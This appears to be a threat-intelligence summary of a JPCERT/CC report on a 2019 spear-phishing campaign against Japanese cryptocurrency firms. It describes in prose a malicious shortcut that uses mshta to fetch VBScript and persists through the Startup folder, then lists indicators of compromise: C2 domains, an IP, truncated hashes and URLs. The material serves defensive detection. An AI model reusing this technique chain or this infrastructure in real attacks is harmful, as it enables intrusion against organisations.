2019-07-09 • JPCERT •
https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html
JPCERT/CC observed targeted phishing emails against Japanese organizations, especially cryptocurrency-related entities, that delivered a ZIP file containing a password-protected decoy document and a malicious shortcut named “Password.txt.lnk.” The shortcut launched mshta to retrieve VBScript from a shortened URL, showed the decoy password to the user, wrote a downloader in the temporary directory, and created a Startup-folder shortcut for persistence when selected security-product process names were absent. The downloader sent POST requests every three minutes and executed returned VBScript, while a later script collected infected-device information every minute and could receive additional encoded payloads. Infrastructure included service.amzonnews.club and update.gdrives.top, with multiple sample hashes and related C2 servers listed in appendices. The limited access counts and cryptocurrency-themed decoys indicate a narrow, customized campaign rather than broad commodity delivery.
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | googledrive.publicvm.com | 2019-07-09 | 2022-01-13 |
| DOMAIN | mskpupdate.publicvm.com | 2019-07-09 | 2021-05-24 |
| DOMAIN | drivegoogle.publicvm.com | 2019-07-09 | 2021-05-24 |
| DOMAIN | mdown.showprice.xyz | 2019-07-09 | 2021-01-28 |
| IPv4 | 75.133.9.84 | 2019-07-09 | 2021-01-28 |
| HASH | 1533374acf886bc3015c4cba3da1c67… | 2019-07-09 | 2020-08-18 |
| HASH | a464781b616c86bbd68dbf909826444… | 2019-07-09 | 2020-08-18 |
| HASH | 997c4f7695a6a615da069d5f839582f… | 2019-07-09 | 2020-08-18 |
| HASH | 7446efa798cfa7908e78e7fb2bf3ac5… | 2019-07-09 | 2020-08-18 |
| DOMAIN | gbackup.gogleshare.xyz | 2019-07-09 | 2020-08-18 |
| DOMAIN | eu.euprotect.net | 2019-07-09 | 2020-08-18 |
| DOMAIN | drive.gogleshare.xyz | 2019-07-09 | 2020-08-18 |
| DOMAIN | download.showprice.xyz | 2019-07-09 | 2020-08-18 |
| DOMAIN | googldocs.org | 2019-07-09 | 2020-08-18 |
| DOMAIN | drverify.dns-cloud.net | 2019-07-09 | 2020-08-18 |
| DOMAIN | europasec.dnsabr.com | 2019-07-09 | 2020-08-18 |
| DOMAIN | start.showprice.xyz | 2019-07-09 | 2020-05-06 |
| DOMAIN | iellsfileshare.sharedrivegght.x… | 2019-07-09 | 2020-05-06 |
| DOMAIN | docs.googlefiledrive.com | 2019-07-09 | 2020-05-06 |
| HASH | b077edc8d08796cdff8b75e5cb66e01… | 2019-07-09 | 2019-07-09 |
| HASH | c60aedbb20fdea048fa2d4b3bdc520f… | 2019-07-09 | 2019-07-09 |
| HASH | 9b20767b11f7e54644104d455aa25c6… | 2019-07-09 | 2019-07-09 |
| HASH | f9e299c562195513968be88c6096957… | 2019-07-09 | 2019-07-09 |
| HASH | 7dcbeb1806296739acfa5819872e8d9… | 2019-07-09 | 2019-07-09 |
| HASH | 01b5cd525d18e28177924d8a7805c20… | 2019-07-09 | 2019-07-09 |
| HASH | dc5f81c5bf0f5905ff2b6bdc4e1171f… | 2019-07-09 | 2019-07-09 |
| HASH | e982a70cb21c915d847925bd364d6d8… | 2019-07-09 | 2019-07-09 |
| HASH | 10ce173cfe83321b44139e3d7d20c5a… | 2019-07-09 | 2019-07-09 |
| HASH | 57278dab6a0e8438444996503a6528f… | 2019-07-09 | 2019-07-09 |
| HASH | 71346d2cb7ecf45d7fe221ede76da51… | 2019-07-09 | 2019-07-09 |
| HASH | 4ecab0f81a2da70df5f2260bab7c8c1… | 2019-07-09 | 2019-07-09 |
| HASH | de7fde10fabf91c03cdd894e40a19e6… | 2019-07-09 | 2019-07-09 |
| HASH | 9ad472872ba20c66fad56b7340ae869… | 2019-07-09 | 2019-07-09 |
| HASH | d70988e43ebc4981e880489b11b6c37… | 2019-07-09 | 2019-07-09 |
| HASH | 901eca85c5711a53e53c48309b3afd3… | 2019-07-09 | 2019-07-09 |
| HASH | 122674a261ac7061c8a304f3e4a1fb1… | 2019-07-09 | 2019-07-09 |
| URL | http://update.gdrives.top:8080/… | 2019-07-09 | 2019-07-09 |
| URL | http://service.amzonnews.club:8… | 2019-07-09 | 2019-07-09 |
| DOMAIN | downs.showprice.xyz | 2019-07-09 | 2019-07-09 |
| DOMAIN | service.amzonnews.club | 2019-07-09 | 2019-07-09 |
| DOMAIN | update.gdrives.top | 2019-07-09 | 2019-07-09 |
| DOMAIN | u13580130.ct.sendgrid.net | 2019-07-09 | 2019-07-09 |